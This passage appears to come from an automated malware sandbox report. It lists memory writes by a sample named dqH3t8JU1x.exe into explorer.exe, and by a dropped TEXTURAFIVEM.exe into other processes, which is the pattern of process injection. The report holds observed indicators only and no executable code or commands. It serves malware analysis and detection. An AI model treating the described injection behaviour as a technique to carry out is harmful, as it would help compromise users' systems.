            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 57C0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 57D0000 value: 46
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 57E0000 value: 77
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5870000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5880000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5890000 value: 77
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 58A0000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 58B0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 58C0000 value: 77
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 58D0000 value: 77
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 58E0000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5970000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5980000 value: 77
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5990000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 59A0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 59B0000 value: 73
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 59C0000 value: 77
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 59D0000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 59E0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 24010000 value: 4D
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5A70000 value: 00
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 2200 base: 5A80000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 32D0000 value: 4B
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 32E0000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 32F0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3380000 value: 4C
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3390000 value: 4B
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 33A0000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 33B0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 33C0000 value: 47
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 33D0000 value: 4B
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 33E0000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 33F0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3600000 value: 56
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3610000 value: 4B
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3620000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3630000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3A20000 value: 56
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3A30000 value: 4B
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3A40000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3A50000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3A60000 value: 56
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3A70000 value: 4B
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3A80000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3A90000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3AA0000 value: 61
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3AB0000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3AC0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3AD0000 value: 52
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3AE0000 value: 61
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3AF0000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3B00000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3B10000 value: 41
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3B20000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3B30000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3B40000 value: 63
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 3B50000 value: 41
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5310000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5320000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5360000 value: 67
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5370000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5380000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5390000 value: 42
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 53A0000 value: 67
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 53B0000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 53C0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5450000 value: 67
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5460000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5470000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5480000 value: 47
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 54A0000 value: 67
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 54B0000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 54C0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 54D0000 value: 6D
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5560000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5570000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5580000 value: 57
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5590000 value: 6D
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 55A0000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 55B0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 55C0000 value: 6D
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 55D0000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5660000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5670000 value: 61
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5680000 value: 6D
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5690000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 56A0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 56B0000 value: 6E
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 56C0000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 56D0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5760000 value: 5A
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5770000 value: 6E
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5780000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5790000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 57A0000 value: 6F
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 57B0000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 57C0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 57D0000 value: 43
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5860000 value: 6F
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5870000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5880000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5890000 value: 6F
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 58A0000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 58B0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 58C0000 value: 53
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 58D0000 value: 6F
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5960000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5970000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5980000 value: 70
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5990000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 59A0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 59B0000 value: 53
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 59C0000 value: 70
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 59D0000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5A60000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5A70000 value: 73
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5A80000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5A90000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5AA0000 value: 53
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5AB0000 value: 73
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5AC0000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5AD0000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5B60000 value: 75
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5B70000 value: B0
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5B80000 value: 55
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5B90000 value: 47
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5BA0000 value: 75
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5BB0000 value: 90
            Source: C:\Windows\install\TEXTURAFIVEM.exe | Memory written: PID: 1768 base: 5BC0000 value: 55
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 2990000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 4C00000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 4C20000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 4CB0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 4D40000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 61B0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 61F0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 6280000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 62A0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 62C0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 6550000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 6570000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 6590000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 65C0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7450000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7480000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 64E0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 6500000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 6520000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 6540000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7620000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7640000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7670000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 76A0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 76D0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7420000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7700000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7730000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7760000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 77B0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 77E0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7810000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7470000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7840000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7870000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 78A0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 78E0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7910000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7940000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7970000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 79A0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 78B0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 75A0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 75D0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7600000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7A50000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7A80000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 79C0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7CE0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7D20000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7D70000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7DB0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7E00000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7EC0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7F00000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: A940000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: A970000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: D230000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: D270000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: E130000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: E170000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: E530000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: E570000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: E6B0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: E6F0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: E730000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: E770000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: E7B0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: E7F0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: E830000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: E870000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: EA30000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: EA70000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: EAB0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: EAF0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: EB30000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: EC00000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: EBB0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: EB90000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: EC60000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F080000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F0E0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F520000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F070000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: ECF0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 2980000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: FAC0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: FB00000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: FB10000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: AA0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F0B0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: FBB0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: FC30000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: FCD0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: FD10000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F030000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: FD50000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: FD90000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F560000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F5A0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F5E0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F620000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F660000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F6A0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F6E0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F720000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F760000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F7A0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F7E0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F820000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: F860000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 29A0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 4DE0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 4E10000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 4E50000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 4E90000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 4EC0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7230000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7260000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 7290000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 72C0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 72F0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: AEC0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: AE60000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: AE90000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: AED0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: AF00000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: B0A0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: 24010000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: B0F0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\explorer.exe base: B120000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 3330000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 3340000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 3350000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 33E0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 33F0000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 3600000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 3610000
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3620000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3630000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3640000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3650000Jump to behavior
